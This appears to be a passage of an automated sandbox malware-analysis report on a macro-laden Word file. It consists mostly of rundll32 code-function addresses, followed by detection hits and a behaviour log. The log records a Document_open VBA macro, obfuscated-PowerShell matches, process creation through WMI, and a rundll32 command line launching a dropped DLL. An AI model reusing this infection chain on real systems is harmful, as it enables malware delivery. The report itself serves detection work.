                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D80BA10_2_001D80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EA0AF10_2_001EA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D62A310_2_001D62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8ADC10_2_001E8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D96CD10_2_001D96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E20C510_2_001E20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D1CFA10_2_001D1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E26F510_2_001E26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D88E510_2_001D88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E12E210_2_001E12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7F1F10_2_001E7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8D1C10_2_001E8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E5D1D10_2_001E5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E511B10_2_001E511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E2B1610_2_001E2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB11210_2_001DB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0F0C10_2_001E0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7D0310_2_001E7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D153C10_2_001D153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBB3A10_2_001DBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF53610_2_001DF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0D3310_2_001E0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB75F10_2_001DB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D675410_2_001D6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E234910_2_001E2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8F4910_2_001E8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E9B4510_2_001E9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D5B7910_2_001D5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8F7810_2_001D8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE37710_2_001DE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E177310_2_001E1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC76910_2_001DC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0B6810_2_001E0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D839D10_2_001D839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6D9F10_2_001D6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D799810_2_001D7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E878F10_2_001E878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF98C10_2_001DF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E958610_2_001E9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E61B810_2_001E61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E6DB910_2_001E6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D17AC10_2_001D17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E73AC10_2_001E73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D69A010_2_001D69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E1BDF10_2_001E1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9FDC10_2_001D9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E71EF10_2_001E71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD7EB10_2_001DD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E67E910_2_001E67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E3FE710_2_001E3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E31E210_2_001E31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B2C6311_2_004B2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BEE7811_2_004BEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BB41F11_2_004BB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BC0C611_2_004BC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C02C311_2_004C02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C42DA11_2_004C42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B568E11_2_004B568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C389511_2_004C3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C4B4111_2_004C4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B7B6311_2_004B7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B873611_2_004B8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C63C111_2_004C63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BEA4C11_2_004BEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BF44411_2_004BF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BE05A11_2_004BE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C5A6111_2_004C5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C687F11_2_004C687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C7A0F11_2_004C7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C340A11_2_004C340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B2A3011_2_004B2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B9A3711_2_004B9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B4A3511_2_004B4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B96CD11_2_004B96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C20C511_2_004C20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C8ADC11_2_004C8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B88E511_2_004B88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C12E211_2_004C12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B1CFA11_2_004B1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C26F511_2_004C26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B128011_2_004B1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C889D11_2_004C889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004CA0AF11_2_004CA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B62A311_2_004B62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B80BA11_2_004B80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B60B911_2_004B60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B48BD11_2_004B48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C8F4911_2_004C8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C234911_2_004C2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C9B4511_2_004C9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BB75F11_2_004BB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B675411_2_004B6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BC76911_2_004BC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C0B6811_2_004C0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B5B7911_2_004B5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B8F7811_2_004B8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BE37711_2_004BE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C177311_2_004C1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C0F0C11_2_004C0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C7D0311_2_004C7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C8D1C11_2_004C8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C5D1D11_2_004C5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C7F1F11_2_004C7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C511B11_2_004C511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BB11211_2_004BB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C2B1611_2_004C2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BBB3A11_2_004BBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B153C11_2_004B153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BF53611_2_004BF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C0D3311_2_004C0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C1BDF11_2_004C1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B9FDC11_2_004B9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BD7EB11_2_004BD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C71EF11_2_004C71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C67E911_2_004C67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C3FE711_2_004C3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C31E211_2_004C31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C878F11_2_004C878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BF98C11_2_004BF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C958611_2_004C9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B799811_2_004B7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B6D9F11_2_004B6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B839D11_2_004B839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C73AC11_2_004C73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B17AC11_2_004B17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B69A011_2_004B69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C61B811_2_004C61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C6DB911_2_004C6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DEE7812_2_007DEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D2C6312_2_007D2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DB41F12_2_007DB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E42DA12_2_007E42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DC0C612_2_007DC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E02C312_2_007E02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E389512_2_007E3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D568E12_2_007D568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D7B6312_2_007D7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E4B4112_2_007E4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D873612_2_007D8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E63C112_2_007E63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E687F12_2_007E687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E5A6112_2_007E5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DE05A12_2_007DE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DEA4C12_2_007DEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DF44412_2_007DF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D4A3512_2_007D4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D9A3712_2_007D9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D2A3012_2_007D2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E7A0F12_2_007E7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E340A12_2_007E340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D1CFA12_2_007D1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E26F512_2_007E26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D88E512_2_007D88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E12E212_2_007E12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E8ADC12_2_007E8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D96CD12_2_007D96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E20C512_2_007E20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D48BD12_2_007D48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D60B912_2_007D60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D80BA12_2_007D80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007EA0AF12_2_007EA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D62A312_2_007D62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E889D12_2_007E889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D128012_2_007D1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D5B7912_2_007D5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D8F7812_2_007D8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DE37712_2_007DE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E177312_2_007E1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DC76912_2_007DC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E0B6812_2_007E0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DB75F12_2_007DB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D675412_2_007D6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E234912_2_007E2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E8F4912_2_007E8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E9B4512_2_007E9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D153C12_2_007D153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DBB3A12_2_007DBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DF53612_2_007DF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E0D3312_2_007E0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E7F1F12_2_007E7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E8D1C12_2_007E8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E5D1D12_2_007E5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E511B12_2_007E511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E2B1612_2_007E2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DB11212_2_007DB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E0F0C12_2_007E0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E7D0312_2_007E7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E71EF12_2_007E71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DD7EB12_2_007DD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E67E912_2_007E67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E3FE712_2_007E3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E31E212_2_007E31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E1BDF12_2_007E1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D9FDC12_2_007D9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E61B812_2_007E61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E6DB912_2_007E6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D17AC12_2_007D17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E73AC12_2_007E73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D69A012_2_007D69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D839D12_2_007D839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D6D9F12_2_007D6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007D799812_2_007D7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E878F12_2_007E878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DF98C12_2_007DF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007E958612_2_007E9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026B41F13_2_0026B41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00262C6313_2_00262C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026EE7813_2_0026EE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026568E13_2_0026568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027389513_2_00273895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026C0C613_2_0026C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002702C313_2_002702C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002742DA13_2_002742DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026873613_2_00268736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00267B6313_2_00267B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00274B4113_2_00274B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002763C113_2_002763C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00269A3713_2_00269A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00264A3513_2_00264A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00262A3013_2_00262A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00277A0F13_2_00277A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027340A13_2_0027340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00275A6113_2_00275A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027687F13_2_0027687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026F44413_2_0026F444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026EA4C13_2_0026EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026E05A13_2_0026E05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002662A313_2_002662A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027A0AF13_2_0027A0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002648BD13_2_002648BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002680BA13_2_002680BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002660B913_2_002660B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026128013_2_00261280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0027889D13_2_0027889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002688E513_2_002688E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002712E213_2_002712E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002726F513_2_002726F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00261CFA13_2_00261CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002720C513_2_002720C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002696CD13_2_002696CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00278ADC13_2_00278ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026F53613_2_0026F536
                    Source: DATA-480841.docOLE, VBA macro line: Private Sub Document_open()
                    Source: VBA code instrumentationOLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_openName: Document_open
                    Source: DATA-480841.docOLE indicator, VBA macros: true
                    Source: 00000005.00000002.2107717841.0000000001CA6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                    Source: 00000005.00000002.2107604650.00000000003D6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                    Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@26/8@7/5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00211C88 CreateToolhelp32Snapshot,15_2_00211C88
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,7_2_10002D70
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$TA-480841.docJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDA28.tmpJump to behavior
                    Source: DATA-480841.docOLE indicator, Word Document stream: true
                    Source: DATA-480841.docOLE document summary: title field not present or empty
                    Source: DATA-480841.docOLE document summary: edited time not present or 0
                    Source: C:\Windows\System32\msg.exeConsole Write: ............K........................... .Y.......Y.....................H...............#...............................h.......5kU.............Jump to behavior
                    Source: C:\Windows\System32\msg.exeConsole Write: ............K...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........u.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j....................................}..v.....s......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j..... ..............................}..v....0t......0.................u.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....h.u.............................}..v............0.................u.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....................................}..v....0.......0...............................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j..... ..............................}..v............0...............8.u.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............t..j....E...............................}..v.....N......0...............h.u.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+...............t..j....E...............................}..v....P.......0...............h.u.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: DATA-480841.docVirustotal: Detection: 59%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
